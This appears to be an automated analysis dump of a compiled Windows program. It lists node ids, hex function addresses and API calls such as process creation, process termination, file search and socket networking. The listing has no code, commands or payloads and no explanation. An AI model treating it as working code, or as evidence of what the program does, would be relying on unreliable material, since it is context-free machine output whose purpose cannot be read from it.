104867->104875 104869->104852 104870->104854 104871->104857 104872->104857 104874->104867 104875->104861 104876->104861 104879 dcc914 104877->104879 104880 dcc8f7 104877->104880 104935 dcc235 417 API calls Mailbox 104879->104935 104880->104879 104881 dccc61 104880->104881 104882 dcc934 104880->104882 104883 dccc6e 104881->104883 104884 dccca9 104881->104884 104882->104879 104913 daabf3 104882->104913 104931 d8d6b4 48 API calls 104883->104931 104884->104879 104889 dcccb6 104884->104889 104886 dcc964 104886->104879 104887 dcc973 104886->104887 104899 dcc9a1 104887->104899 104917 daa8c8 104887->104917 104933 d8d6b4 48 API calls 104889->104933 104890 dccc87 104932 db97b6 89 API calls 104890->104932 104894 dcccd6 104934 db503c 91 API calls Mailbox 104894->104934 104900 dcca4a 104899->104900 104927 daa25b 106 API calls 104899->104927 104910 dccc52 104910->104820 104914 daac16 104913->104914 104915 daac04 __NMSG_WRITE 104913->104915 104914->104886 104915->104914 104936 d73bcf 104915->104936 104918 daa8f2 104917->104918 104927->104899 104931->104890 104932->104910 104933->104894 104934->104910 104935->104910 104937 d73bd9 __NMSG_WRITE 104936->104937 104938 d9010a 48 API calls 104937->104938 104939 d73bee _wcscpy 104938->104939 104939->104914 104942 d9010a 48 API calls 104941->104942 104943 d7a702 104942->104943 104943->104824 104944->104824 104946 d7a321 _memmove 104945->104946 104947 d7a309 104945->104947 104946->104824 104947->104946 104949 d7b8a7 104947->104949 104950 d7b8ba 104949->104950 104952 d7b8b7 _memmove 104949->104952 104951 d9010a 48 API calls 104950->104951 104951->104952 104952->104946 104954 d7c4e7 104953->104954 104955 d7c4da 104953->104955 104956 d9010a 48 API calls 104954->104956 104955->104843 104956->104955 104957->104746 104958->104742 104960 de787b 104959->104960 104963 d8406c 104959->104963 105134 dbd520 86 API calls 4 library calls 104960->105134 104962 de788c 105135 dbd520 86 API calls 4 library calls 104962->105135 104963->104962 104971 d840a6 _memmove 104963->104971 104965 d84175 104970 d84185 104965->104970 105133 dcd21a 82 API calls Mailbox 104965->105133 104967 d9010a 48 API calls 104967->104971 104968 d841f1 104968->104772 104969 d7fa40 417 API calls 104969->104971 104970->104772 104971->104965 104971->104967 104971->104969 104971->104970 104972 de78d8 104971->104972 105136 dbd520 86 API calls 4 library calls 104972->105136 104975 d784a6 81 API calls 104974->104975 104976 dbdcfc 104975->104976 105137 db6d6d 104976->105137 104978 dbdd06 104978->104769 105149 dc22e5 104979->105149 104981 dc1090 104981->104769 105342 d7cdb4 104982->105342 104984 d8f572 104985 d8f57a timeGetTime 104984->104985 104986 de75d1 Sleep 104984->104986 104987 d7cdb4 48 API calls 104985->104987 104988 d8f590 104987->104988 105347 d7e1f0 104988->105347 104992 d784a6 81 API calls 104991->104992 104993 dc6fd6 SetWindowTextW 104992->104993 104993->104769 104995 d750f6 104994->104995 104996 d75105 104994->104996 104995->104769 104996->104995 104997 d7510a CloseHandle 104996->104997 104997->104995 104999 d7cdb4 48 API calls 104998->104999 105000 dc9515 104999->105000 105001 dbbe47 50 API calls 105000->105001 105002 dc9522 105001->105002 105003 dc952f send 105002->105003 105004 dc9546 105003->105004 105005 dc9552 WSAGetLastError 105004->105005 105006 dc956a 105004->105006 105005->105006 105006->104769 105008 d784a6 81 API calls 105007->105008 105009 dbeff2 105008->105009 105613 db78ad GetFullPathNameW 105009->105613 105014 dbf04b CoInitialize CoCreateInstance 105016 dbf08e 105014->105016 105017 dbf070 105014->105017 105042 d7d3d2 48 API calls 105041->105042 105043 dd354a 105042->105043 105044 d7d3d2 48 API calls 105043->105044 105045 dd3553 105044->105045 105046 d7d3d2 48 API calls 105045->105046 105047 dd355c 105046->105047 105048 d784a6 81 API calls 105047->105048 105059 dd35e9 Mailbox 105047->105059 105049 dd3580 105048->105049 105633 dd3d7b 105049->105633 105059->104769 105130 dc95e0 105129->105130 105130->104769 105131->104770 105132->104769 105133->104968 105134->104962 105135->104970 105136->104970 105138 db6d8a __NMSG_WRITE 105137->105138 105139 db6db3 GetFileAttributesW 105138->105139 105140 db6de3 105139->105140 105141 db6dc5 GetLastError 105139->105141 105140->104978 105142 db6dd0 CreateDirectoryW 105141->105142 105143 db6de7 105141->105143 105142->105140 105142->105143 105143->105140 105144 d73bcf 48 API calls 105143->105144 105145 db6df7 _wcsrchr 105144->105145 105145->105140 105146 db6d6d 48 API calls 105145->105146 105147 db6e1b 105146->105147 105147->105140 105148 db6e28 CreateDirectoryW 105147->105148 105148->105140 105150 dc2306 105149->105150 105151 dc230a 105150->105151 105152 dc2365 105150->105152 105154 d9010a 48 API calls 105151->105154 105218 d8f0f3 48 API calls 105152->105218 105155 dc2311 105154->105155 105156 dc231f 105155->105156 105205 d75080 49 API calls 105155->105205 105158 d784a6 81 API calls 105156->105158 105161 dc2331 105158->105161 105159 dc2379 105160 dc234d 105159->105160 105163 dc243f 105159->105163 105166 dc23bb 105159->105166 105160->104981 105206 d74bf9 105161->105206 105225 dbbe47 105163->105225 105169 d784a6 81 API calls 105166->105169 105167 dc2446 105229 db689f SetFilePointerEx SetFilePointerEx WriteFile 105167->105229 105176 dc23c2 105169->105176 105171 dc23f6 105187 db67dc 105171->105187 105174 dc2400 105219 d77b6e 105174->105219 105176->105171 105176->105174 105180 dc23fe Mailbox 105180->105160 105182 d750ec CloseHandle 105180->105182 105184 dc2490 105182->105184 105230 d74592 CloseHandle 105184->105230 105188 db67ec 105187->105188 105189 db67f6 105187->105189 105247 db6917 SetFilePointerEx SetFilePointerEx WriteFile 105188->105247 105191 db6808 105189->105191 105192 db67fc 105189->105192 105194 db6811 105191->105194 105195 db6824 105191->105195 105248 db68b9 51 API calls 105192->105248 105196 d7a6d4 48 API calls 105194->105196 105231 d7a6d4 105195->105231 105204 db67f4 Mailbox 105204->105180 105205->105156 105207 d750ec CloseHandle 105206->105207 105208 d74c04 105207->105208 105287 d74b88 105208->105287 105218->105159 105220 d9010a 48 API calls 105219->105220 105221 d77b93 105220->105221 105222 d7a6f8 48 API calls 105221->105222 105223 d77ba2 105222->105223 105226 dbbe50 105225->105226 105227 dbbe55 105225->105227 105341 dbae06 50 API calls 2 library calls 105226->105341 105227->105167 105229->105180 105230->105160 105247->105204 105248->105204 105288 d74ba1 CreateFileW 105287->105288 105289 de4957 105287->105289 105291 d74bc3 105288->105291 105290 de495d CreateFileW 105289->105290 105289->105291 105290->105291 105341->105227 105343 d7cdc5 105342->105343 105344 d7cdca 105342->105344 105343->105344 105409 d92241 48 API calls 105343->105409 105344->104984 105346 d7ce07 105346->104984 105348 d7e216 105347->105348 105408 d7e226 Mailbox 105347->105408 105349 d7e670 105348->105349 105348->105408 105478 d8ecee 417 API calls 105349->105478 105351 d7e4e7 105352 d7e4fd 105351->105352 105479 d7322e 16 API calls 105351->105479 105352->104769 105354 d7e681 105354->105352 105355 d7e68e 105354->105355 105480 d8ec33 417 API calls Mailbox 105355->105480 105356 d7e26c PeekMessageW 105356->105408 105358 de5b13 Sleep 105358->105408 105359 d7e695 LockWindowUpdate DestroyWindow GetMessageW 105359->105352 105364 d8cf79 49 API calls 105364->105408 105366 d7e657 PeekMessageW 105366->105408 105367 d9010a 48 API calls 105367->105408 105368 d7e517 timeGetTime 105368->105408 105370 d7c935 48 API calls 105370->105408 105371 de5dfc WaitForSingleObject 105374 de5e19 GetExitCodeProcess CloseHandle 105371->105374 105371->105408 105372 d7e641 TranslateMessage DispatchMessageW 105372->105366 105373 de6147 Sleep 105400 de5cce Mailbox 105373->105400 105374->105408 105375 d7d3d2 48 API calls 105375->105400 105376 d7e6cc timeGetTime 105481 d8cf79 49 API calls 105376->105481 105377 de5feb Sleep 105377->105408 105382 de61de GetExitCodeProcess 105386 de620a CloseHandle 105382->105386 105387 de61f4 WaitForSingleObject 105382->105387 105384 d71000 393 API calls 105384->105408 105386->105400 105387->105386 105387->105408 105388 de5cea Sleep 105388->105408 105390 d71dce 107 API calls 105390->105408 105391 de5cd7 Sleep 105391->105388 105392 dd8a48 108 API calls 105392->105400 105393 de6266 Sleep 105393->105408 105394 d7caee 48 API calls 105394->105400 105399 d7fa40 393 API calls 105399->105408 105400->105375 105400->105382 105400->105388 105400->105391 105400->105392 105400->105393 105400->105394 105400->105408 105483 db56dc 49 API calls Mailbox 105400->105483 105484 d8cf79 49 API calls 105400->105484 105485 d7d380 105400->105485 105489 d71000 417 API calls 105400->105489 105491 dcd12a 50 API calls 105400->105491 105492 db8355 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 105400->105492 105493 d8e3a5 timeGetTime 105400->105493 105494 db6f5b CreateToolhelp32Snapshot Process32FirstW 105400->105494 105402 d844e0 393 API calls 105402->105408 105403 d83680 393 API calls 105403->105408 105404 d7caee 48 API calls 105404->105408 105406 dbd520 86 API calls 105406->105408 105407 d7d380 55 API calls 105407->105408 105408->105351 105408->105356 105408->105358 105408->105364 105408->105366 105408->105367 105408->105368 105408->105370 105408->105371 105408->105372 105408->105373 105408->105376 105408->105377 105408->105384 105408->105388 105408->105390 105408->105399 105408->105400 105408->105402 105408->105403 105408->105404 105408->105406 105408->105407 105410 d7e7e0 105408->105410 105417 d7ea00 105408->105417 105467 d8f381 105408->105467 105472 d8ed1a 105408->105472 105477 d7e7b0 417 API calls Mailbox 105408->105477 105482 dd8b20 48 API calls 105408->105482 105490 d8e3a5 timeGetTime 105408->105490 105409->105346 105411 d7e7fd 105410->105411 105413 d7e80f 105410->105413 105501 d7dcd0 105411->105501 105532 dbd520 86 API calls 4 library calls 105413->105532 105416 de98e8 105416->105416 105418 d7ea20 105417->105418 105419 d7fa40 417 API calls 105418->105419 105421 d7ea89 105418->105421 105422 de9919 105419->105422 105420 de99bc 105547 dbd520 86 API calls 4 library calls 105420->105547 105426 d7d3d2 48 API calls 105421->105426 105448 d7eb18 105421->105448 105454 d7ecd7 Mailbox 105421->105454 105422->105421 105544 dbd520 86 API calls 4 library calls 105422->105544 105424 d7d3d2 48 API calls 105427 de9997 105424->105427 105428 de9963 105426->105428 105545 d91b2a 52 API calls __cinit 105428->105545 105431 d7d380 55 API calls 105431->105454 105433 de9d70 105556 dce2fb 417 API calls Mailbox 105433->105556 105434 de9e49 105561 dbd520 86 API calls 4 library calls 105434->105561 105435 dbd520 86 API calls 105435->105454 105436 de9dc2 105558 dbd520 86 API calls 4 library calls 105436->105558 105437 de9ddf 105559 dcc235 417 API calls Mailbox 105437->105559 105439 d7fa40 417 API calls 105439->105454 105444 d7342c 48 API calls 105444->105454 105447 d814a0 48 API calls 105447->105454 105448->105424 105448->105454 105451 d7f56f 105466 d7ef0c Mailbox 105451->105466 105557 dbd520 86 API calls 4 library calls 105451->105557 105453 de9a3c 105550 dcd154 48 API calls 105453->105550 105454->105420 105454->105431 105454->105433 105454->105434 105454->105435 105454->105436 105454->105437 105454->105439 105454->105444 105454->105447 105454->105451 105454->105453 105454->105466 105540 d7d805 105454->105540 105548 dba3ee 48 API calls 105454->105548 105549 dcede9 417 API calls 105454->105549 105554 daa599 InterlockedDecrement 105454->105554 105555 dcf4df 417 API calls 105454->105555 105466->105408 105468 d8f390 105467->105468 105469 deee11 105467->105469 105468->105408 105470 deee46 105469->105470 105471 deee28 TranslateAcceleratorW 105469->105471 105471->105468 105473 d8ed2c 105472->105473 105475 d8ed34 105472->105475 105473->105408 105474 d8ed5e IsDialogMessageW 105474->105473 105474->105475 105475->105473 105475->105474 105476 deebec GetClassLongW 105475->105476 105476->105474 105476->105475 105477->105408 105478->105351 105479->105354 105480->105359 105481->105408 105482->105408 105483->105400 105484->105400 105486 d7d38b 105485->105486 105487 d7d3b4 105486->105487 105562 d7d772 55 API calls 105486->105562 105487->105400 105489->105400 105490->105408 105491->105400 105492->105400 105493->105400 105563 db79c2 105494->105563 105499 db6fa0 _wcscat 105502 d7fa40 417 API calls 105501->105502 105515 d7dd0f _memmove 105502->105515 105503 de8dbe 105506 d7dd70 105507 d7e12b Mailbox 105510 d9010a 48 API calls 105510->105515 105515->105503 105515->105506 105515->105507 105515->105510 105517 d7deb7 105515->105517 105527 d7df29 105515->105527 105517->105507 105532->105416 105541 d7d828 _memmove 105540->105541 105542 d7d815 105540->105542 105541->105454 105542->105541 105544->105421 105545->105448 105547->105466 105548->105454 105549->105454 105554->105454 105555->105454 105556->105451 105557->105466 105558->105466 105561->105466 105562->105487 105564 db79e9 105563->105564 105565 db79d0 105563->105565 105583 d9224a 58 API calls __wcstoi64 105564->105583 105565->105564 105568 db79ef 105565->105568 105582 d922df GetStringTypeW wcstoxq 105565->105582 105568->105499 105582->105565 105583->105568 105614 d77e53 48 API calls 105613->105614 105615 db78df 105614->105615 105627 d8e617 105615->105627 105618 dc267a 105619 dc26a4 __NMSG_WRITE 105618->105619 105620 dbf039 105619->105620 105621 dc26d8 105619->105621 105624 dc2763 105619->105624 105620->105014 105625 d739e8 48 API calls 2 library calls 105620->105625 105621->105620 105631 d8dfd2 60 API calls 105621->105631 105624->105620 105632 d8dfd2 60 API calls 105624->105632 105625->105014 105628 d8e625 105627->105628 105629 d7a2fb 48 API calls 105628->105629 105630 d8e635 105629->105630 105630->105618 105631->105621 105632->105624 105634 d7c4cd 48 API calls 105633->105634 105635 dd3d89 105634->105635 105636 d7c4cd 48 API calls 105635->105636 105637 dd3d91 105636->105637 105638 d7c4cd 48 API calls 105637->105638 105690->104802 105691->104802 105692->104190 105693->104190 105694->104190 105695->104190 105696->104190 105697->104188 105698->104189 105699->104175 105700->104172 105701->104178 105702->104186 105704 d8f069 105703->105704 105705 d8f057 105703->105705 105708 d7c4cd 48 API calls 105704->105708 105706 d8f05d 105705->105706 105707 d8f063 105705->105707 105710 d7a6d4 48 API calls 105706->105710 105709 d7a6d4 48 API calls 105707->105709 105718 db64f5 105708->105718 105711 db668b 105709->105711 105713 d8f081 105710->105713 105714 d74c4f 50 API calls 105711->105714 105712 db6524 105712->104259 105738 d74c4f 105713->105738 105717 db6699 105714->105717 105725 db66a9 Mailbox 105717->105725 105765 db6765 50 API calls 105717->105765 105718->105712 105763 db649b ReadFile SetFilePointerEx 105718->105763 105764 d7bd2f 48 API calls _memmove 105718->105764 105720 de49b2 105724 d8f0a3 Mailbox 105724->104259 105725->104259 105727 d77bfb 105726->105727 105728 d77c3a 105726->105728 105731 d9010a 48 API calls 105727->105731 105729 d7c935 48 API calls 105728->105729 105730 d77c0e 105729->105730 105730->104262 105731->105730 105732->104232 105733->104263 105734->104233 105735->104237 105736->104254 105737->104261 105739 d8f324 48 API calls 105738->105739 105742 d74c60 105739->105742 105740 d74c95 105740->105720 105744 d7c610 MultiByteToWideChar 105740->105744 105741 d74ca0 2 API calls 105741->105742 105742->105740 105742->105741 105766 d74d29 105742->105766 105745 de24df 105744->105745 105746 d7c638 105744->105746 105747 d7c4cd 48 API calls 105745->105747 105748 d9010a 48 API calls 105746->105748 105749 de24e7 105747->105749 105750 d7c64f MultiByteToWideChar 105748->105750 105755 d7a6f8 48 API calls 105749->105755 105751 d7c6b7 105750->105751 105752 d7c66c 105750->105752 105753 d7a2fb 48 API calls 105751->105753 105752->105751 105756 d7c675 105752->105756 105754 d7c6c3 105753->105754 105754->105724 105757 de24f6 105755->105757 105756->105749 105758 d7c686 105756->105758 105759 d9010a 48 API calls 105757->105759 105760 d7c68e _memmove 105758->105760 105762 d9010a 48 API calls 105758->105762 105761 de2518 105759->105761 105760->105724 105762->105760 105763->105718 105764->105718 105765->105725 105767 de45cf 105766->105767 105768 d74d3d 105766->105768 105770 d7a6f8 48 API calls 105767->105770 105775 d74d67 105768->105775 105772 de45da 105770->105772 105771 d74d49 105771->105742 105773 d9010a 48 API calls 105772->105773 105774 de45ef _memmove 105773->105774 105777 d74d7d 105775->105777 105779 d74d78 _memmove 105775->105779 105776 de4703 105777->105776 105778 d9010a 48 API calls 105777->105778 105778->105779 105779->105771 105781 dd23eb _memset 105780->105781 105782 dd2428 105781->105782 105783 dd2452 105781->105783 105784 d7cdb4 48 API calls 105782->105784 105787 d7cdb4 48 API calls 105783->105787 105788 dd2476 105783->105788 105785 dd2433 105784->105785 105785->105788 105790 d7cdb4 48 API calls 105785->105790 105786 dd24b0 105792 d784a6 81 API calls 105786->105792 105789 dd2448 105787->105789 105788->105786 105791 d7cdb4 48 API calls 105788->105791 105794 d7cdb4 48 API calls 105789->105794 105790->105789 105791->105786 105793 dd24d4 105792->105793 105795 d73bcf 48 API calls 105793->105795 105794->105788 105796 dd24de 105795->105796 105797 dd24e8 105796->105797 105798 dd25a1 105796->105798 105799 d784a6 81 API calls 105797->105799 105800 dd25d3 GetCurrentDirectoryW 105798->105800 105803 d784a6 81 API calls 105798->105803 105801 dd24f9 105799->105801 105802 d9010a 48 API calls 105800->105802 105804 d73bcf 48 API calls 105801->105804 105805 dd25f8 GetCurrentDirectoryW 105802->105805 105806 dd25b8 105803->105806 105807 dd2503 105804->105807 105808 dd2605 105805->105808 105809 d73bcf 48 API calls 105806->105809 105810 d784a6 81 API calls 105807->105810 105814 d7ca8e 48 API calls 105808->105814 105820 dd263e 105808->105820 105811 dd25c2 __NMSG_WRITE 105809->105811 105812 dd2514 105810->105812 105811->105800 105811->105820 105813 d73bcf 48 API calls 105812->105813 105815 dd251e 105813->105815 105816 dd261e 105814->105816 105817 d784a6 81 API calls 105815->105817 105818 d7ca8e 48 API calls 105816->105818 105822 dd252f 105817->105822 105823 dd262e 105818->105823 105819 dd268a 105825 dd274c CreateProcessW 105819->105825 105826 dd26c1 105819->105826 105820->105819 105858 dba17a 8 API calls 105820->105858 105827 d73bcf 48 API calls 105822->105827 105828 d7ca8e 48 API calls 105823->105828 105824 dd2655 105859 dba073 8 API calls 105824->105859 105837 dd276b 105825->105837 105861 dabc90 69 API calls 105826->105861 105831 dd2539 105827->105831 105828->105820 105833 dd256f GetSystemDirectoryW 105831->105833 105836 d784a6 81 API calls 105831->105836 105832 dd2670 105860 dba102 8 API calls 105832->105860 105835 d9010a 48 API calls 105833->105835 105838 dd2594 GetSystemDirectoryW 105835->105838 105839 dd2550 105836->105839 105842 dd27bd CloseHandle 105837->105842 105843 dd2780 105837->105843 105838->105808 105840 d73bcf 48 API calls 105839->105840 105849 dd255a __NMSG_WRITE 105840->105849 105841 dd26df __NMSG_WRITE 105841->105837 105841->105841 105844 dd27cb 105842->105844 105846 dd27f5 105842->105846 105847 dd2791 GetLastError 105843->105847 105862 db9d09 CloseHandle Mailbox 105844->105862 105845 dd27fb 105850 dd27a5 105845->105850 105846->105845 105855 dd2827 CloseHandle 105846->105855 105847->105850 105849->105808 105849->105833 105863 db9b29 CloseHandle 105850->105863 105855->105850 105856 dd1f2b 105856->104060 105858->105824 105859->105832 105860->105819 105861->105841 105863->105856 105864->104293 105865->104309 105866->104309 105867->104320 105868->104312 105869->104309 105870->104307 105871->104357 105872->104383 105874 d71990 105873->105874 105878 d719af _memmove 105873->105878 105876 d9010a 48 API calls 105874->105876 105875 d9010a 48 API calls 105877 d719c6 105875->105877 105876->105878 105877->104412 105878->105875 105879->104395 105880->104406 105881->104403 105882->104418 105884 d784a6 81 API calls 105883->105884 105885 dcf7db 105884->105885 105900 dcf81d Mailbox 105885->105900 105919 dd0458 105885->105919 105887 dcfa7c 105888 dcfbeb 105887->105888 105892 dcfa86 105887->105892 105965 dd0579 89 API calls Mailbox 105888->105965 105891 dcfbf8 105891->105892 105894 dcfc04 105891->105894 105932 dcf5fb 105892->105932 105893 d784a6 81 API calls 105905 dcf875 Mailbox 105893->105905 105894->105900 105899 dcfaba 105946 d8f92c 105899->105946 105900->104421 105903 dcfaee 105953 d73320 105903->105953 105904 dcfad4 105952 dbd520 86 API calls 4 library calls 105904->105952 105905->105887 105905->105893 105905->105900 105950 dd28d9 48 API calls _memmove 105905->105950 105951 dcfc96 60 API calls 2 library calls 105905->105951 105908 dcfadf GetCurrentProcess TerminateProcess 105908->105903 105909 dcfb05 105911 d814a0 48 API calls 105909->105911 105918 dcfb2f 105909->105918 105910 dcfc56 105910->105900 105912 dcfb1e 105911->105912 105914 d814a0 48 API calls 105914->105918 105917 d7d89e 50 API calls 105917->105918 105918->105910 105918->105914 105918->105917 105966 dd0300 105 API calls _free 105918->105966 105920 d7b8a7 48 API calls 105919->105920 105921 dd0473 CharLowerBuffW 105920->105921 105922 dc267a 60 API calls 105921->105922 105923 dd0494 105922->105923 105925 d7d3d2 48 API calls 105923->105925 105930 dd04cf Mailbox 105923->105930 105926 dd04ac 105925->105926 105927 d77f40 48 API calls 105926->105927 105928 dd04c3 105927->105928 105929 d7a2fb 48 API calls 105928->105929 105929->105930 105931 dd050b Mailbox 105930->105931 105967 dcfc96 60 API calls 2 library calls 105930->105967 105931->105905 105933 dcf616 105932->105933 105937 dcf66b 105932->105937 105934 d9010a 48 API calls 105933->105934 105936 dcf638 105934->105936 105935 d9010a 48 API calls 105935->105936 105936->105935 105936->105937 105938 dd0719 105937->105938 105939 dd0944 Mailbox 105938->105939 105943 dd073c _strcat _wcscpy __NMSG_WRITE 105938->105943 105939->105899 105940 d7d00b 58 API calls 105940->105943 105941 d7cdb4 48 API calls 105941->105943 105942 d784a6 81 API calls 105942->105943 105943->105939 105943->105940 105943->105941 105943->105942 105944 d945ec 47 API calls __crtLCMapStringA_stat 105943->105944 105968 db8932 50 API calls __NMSG_WRITE 105943->105968 105944->105943 105947 d8f941 105946->105947 105948 d8f9d9 select 105947->105948 105949 d8f9a7 105947->105949 105948->105949 105949->105903 105949->105904 105950->105905 105951->105905 105952->105908 105954 d73334 105953->105954 105956 d73339 Mailbox 105953->105956 105969 d7342c 48 API calls 105954->105969 105961 d73347 105956->105961 105970 d7346e 48 API calls 105956->105970 105958 d9010a 48 API calls 105960 d733d8 105958->105960 105959 d73422 105959->105909 105962 d9010a 48 API calls 105960->105962 105961->105958 105961->105959 105963 d733e3 105962->105963 105963->105909 105965->105891 105966->105918 105967->105931 105968->105943 105969->105956 105970->105961 105972 de4a7d FindFirstFileW 105971->105972 105973 d8dd89 105971->105973 105974 de4a8e 105972->105974 105975 de4a95 FindClose 105972->105975 105973->104060 105974->105975 105977 dc6b25 GetWindowRect 105976->105977 105978 dc6b42 105976->105978 105979 dc6b5c 105977->105979 105978->105979 105980 dc6b52 ClientToScreen 105978->105980 105979->104428 105979->104431 105980->105979 105981->104434 105982->104438 105984 db7700 105983->105984 105995 db76f9 _wcsncpy 105983->105995 105985 d9010a 48 API calls 105984->105985 105986 db7706 GetFileVersionInfoW 105985->105986 105987 db7722 __NMSG_WRITE 105986->105987 105988 d9010a 48 API calls 105987->105988 105990 db7739 _wcscat _wcscmp _wcscpy _wcsstr 105988->105990 105989 d91bc7 _W_store_winword 59 API calls 105991 db77f7 105989->105991 105993 db7779 755A1560 105990->105993 105994 db7793 _wcscat 105990->105994 105992 db7827 755A1560 105991->105992 105991->105995 105992->105995 105996 db783d _wcscmp 105992->105996 105993->105994 105994->105989 105995->104446 105996->105995 105998 d9234b 80 API calls 2 library calls 105996->105998 105998->105995 106000 d7816b 105999->106000 106001 d780f9 105999->106001 106002 d7a2fb 48 API calls 106000->106002 106001->106000 106003 d78105 106001->106003 106004 d7813a _memmove 106002->106004 106005 d78163 106003->106005 106006 d78110 106003->106006 106004->104490 106023 d77eda 48 API calls 106005->106023 106007 d7a6f8 48 API calls 106006->106007 106009 d7811a 106007->106009 106010 d9010a 48 API calls 106009->106010 106010->106004 106011->104490 106013 d9010a 48 API calls 106012->106013 106014 d7818f 106013->106014 106014->104490 106015->104490 106016->104501 106017->104501 106018->104490 106019->104463 106020->104520 106021->104479 106022->104506 106023->106004 106032 dcae3b 106024->106032 106027 dcad05 Mailbox 106028 dcad31 htons 106027->106028 106029 dcad1b 106027->106029 106028->106029 106029->104528 106031 dbd7f2 106030->106031 106031->104535 106033 d7a6d4 48 API calls 106032->106033 106034 dcae49 106033->106034 106037 dcae79 WideCharToMultiByte 106034->106037 106036 dcacf3 inet_addr 106036->106027 106038 dcae9d 106037->106038 106039 dcaea7 106037->106039 106040 d8f324 48 API calls 106038->106040 106041 d9010a 48 API calls 106039->106041 106044 dcaea5 106040->106044 106042 dcaeae WideCharToMultiByte 106041->106042 106043 d8f2d0 48 API calls 106042->106043 106043->106044 106044->106036 106046 d7d89e 50 API calls 106045->106046 106047 d71a08 106046->106047 106048 dedb7d 106047->106048 106049 d71a12 106047->106049 106051 d77e53 48 API calls 106048->106051 106050 d784a6 81 API calls 106049->106050 106052 d71a1f 106050->106052 106053 dedb8d 106051->106053 106054 d7c935 48 API calls 106052->106054 106053->106053 106055 d71a2d 106054->106055 106056 d71dce 106055->106056 106057 d71de4 Mailbox 106056->106057 106058 dedb26 106057->106058 106059 d71dfd 106057->106059 106060 dedb2b IsWindow 106058->106060 106063 d71e46 106059->106063 106064 d784a6 81 API calls 106059->106064 106061 dedb3f 106060->106061 106069 d71e51 106060->106069 106124 d7200a 106061->106124 106066 dedb65 IsWindow 106063->106066 106063->106069 106067 d71e17 106064->106067 106066->106061 106066->106069 106071 d71f04 106067->106071 106068 d7197e 48 API calls 106068->106069 106069->104540 106072 d71f1a Mailbox 106071->106072 106073 d7c935 48 API calls 106072->106073 106074 d71f3e 106073->106074 106075 d7c935 48 API calls 106074->106075 106076 d71f49 106075->106076 106077 d77e53 48 API calls 106076->106077 106078 d71f59 106077->106078 106079 d7d3d2 48 API calls 106078->106079 106080 d71f87 106079->106080 106081 d7d3d2 48 API calls 106080->106081 106082 d71f90 106081->106082 106083 d7d3d2 48 API calls 106082->106083 106084 d71f99 106083->106084 106085 de2569 106084->106085 106086 d71fac 106084->106086 106128 dae4ea 60 API calls 3 library calls 106085->106128 106087 de2583 106086->106087 106089 d71fbe GetForegroundWindow 106086->106089 106125 d72016 106124->106125 106126 d9010a 48 API calls 106125->106126 106127 d72023 106126->106127 106127->106068 106128->106087 106163->104554 106164->104556 106166 d7c4cd 48 API calls 106165->106166 106167 dae2fe 106166->106167 106182 d7193b SendMessageTimeoutW 106167->106182 106169 dae305 106170 dae309 Mailbox 106169->106170 106183 dae390 106169->106183 106170->104570 106172 dae314 106173 d9010a 48 API calls 106172->106173 106174 dae338 SendMessageW 106173->106174 106174->106170 106175 dae34e _strlen 106174->106175 106176 dae35a 106175->106176 106177 dae378 106175->106177 106188 dae0f5 48 API calls 2 library calls 106176->106188 106178 d77e53 48 API calls 106177->106178 106178->106170 106180 dae362 106181 d7c610 50 API calls 106180->106181 106181->106170 106182->106169 106189 d7193b SendMessageTimeoutW 106183->106189 106185 dae39a 106186 dae39e 106185->106186 106187 dae3a2 SendMessageW 106185->106187 106186->106172 106187->106172 106188->106180 106189->106185 106190->104597 106191->104599 106192->104596 106194 d7a9af 106193->106194 106197 d7a9ca 106193->106197 106195 d7b8a7 48 API calls 106194->106195 106196 d7a9b7 CharUpperBuffW 106195->106196 106196->106197 106197->104612 106199 de4c5a 106198->106199 106200 d710f9 106198->106200 106201 d9010a 48 API calls 106200->106201 106203 d71100 106201->106203 106202 d71121 106202->104631 106203->106202 106232 d7113c 48 API calls 106203->106232 106205->104621 106206->104670 106207->104670 106208->104670 106209->104679 106210->104621 106212 d7d2df 106211->106212 106215 d7d30a 106211->106215 106213 d7d2e6 106212->106213 106234 d7d349 53 API calls 106212->106234 106213->106215 106233 d7d349 53 API calls 106213->106233 106215->104635 106215->104636 106217->104672 106218->104661 106219->104661 106220->104668 106221->104672 106222->104648 106223->104672 106224->104672 106225->104672 106226->104670 106227->104670 106228->104670 106229->104672 106230->104667 106231->104672 106232->106202 106233->106215 106234->106213 106235->104689 106236 de4ddc 106237 de4de6 VariantClear 106236->106237 106238 d84472 106236->106238 106237->106238 106239 de1edb 106244 d7131c 106239->106244 106245 d7133e 106244->106245 106278 d71624 106245->106278 106250 d7d3d2 48 API calls 106251 d7137e 106250->106251 106252 d7d3d2 48 API calls 106251->106252 106253 d71388 106252->106253 106254 d7d3d2 48 API calls 106253->106254 106255 d71392 106254->106255 106256 d7d3d2 48 API calls 106255->106256 106257 d713d8 106256->106257 106258 d7d3d2 48 API calls 106257->106258 106259 d714bb 106258->106259 106286 d71673 106259->106286 106324 d717e0 106278->106324 106281 d77e53 48 API calls 106282 d71344 106281->106282 106283 d716db 106282->106283 106338 d71867 6 API calls 106283->106338 106285 d71374 106285->106250 106287 d7d3d2 48 API calls 106286->106287 106288 d71683 106287->106288 106289 d7d3d2 48 API calls 106288->106289 106290 d7168b 106289->106290 106339 d77d70 106290->106339 106293 d77d70 48 API calls 106294 d7169b 106293->106294 106331 d717fc 106324->106331 106327 d717fc 48 API calls 106328 d717f0 106327->106328 106329 d7d3d2 48 API calls 106328->106329 106330 d7165b 106329->106330 106330->106281 106332 d7d3d2 48 API calls 106331->106332 106333 d71807 106332->106333 106334 d7d3d2 48 API calls 106333->106334 106335 d7180f 106334->106335 106336 d7d3d2 48 API calls 106335->106336 106337 d717e8 106336->106337 106337->106327 106338->106285 106340 d7d3d2 48 API calls 106339->106340 106341 d77d79 106340->106341 106342 d7d3d2 48 API calls 106341->106342 106343 d71693 106342->106343 106343->106293 106346 dec05b 106347 dec05d 106346->106347 106350 db78ee WSAStartup 106347->106350 106349 dec066 106351 db79b1 _wcscpy 106350->106351 106352 db7917 gethostname gethostbyname 106350->106352 106351->106349 106352->106351 106353 db793a _memmove 106352->106353 106354 db7970 inet_ntoa 106353->106354 106358 db7952 _wcscpy 106353->106358 106355 db7989 _strcat 106354->106355 106359 db8553 106355->106359 106356 db79a9 WSACleanup 106356->106351 106358->106356 106360 db8561 106359->106360 106361 db8565 _strlen 106359->106361 106360->106358 106362 db8574 MultiByteToWideChar 106361->106362 106362->106360 106363 db858a 106362->106363 106364 d9010a 48 API calls 106363->106364 106365 db85a6 MultiByteToWideChar 106364->106365 106365->106360 106366 d80ff7 106367 d8e016 50 API calls 106366->106367 106368 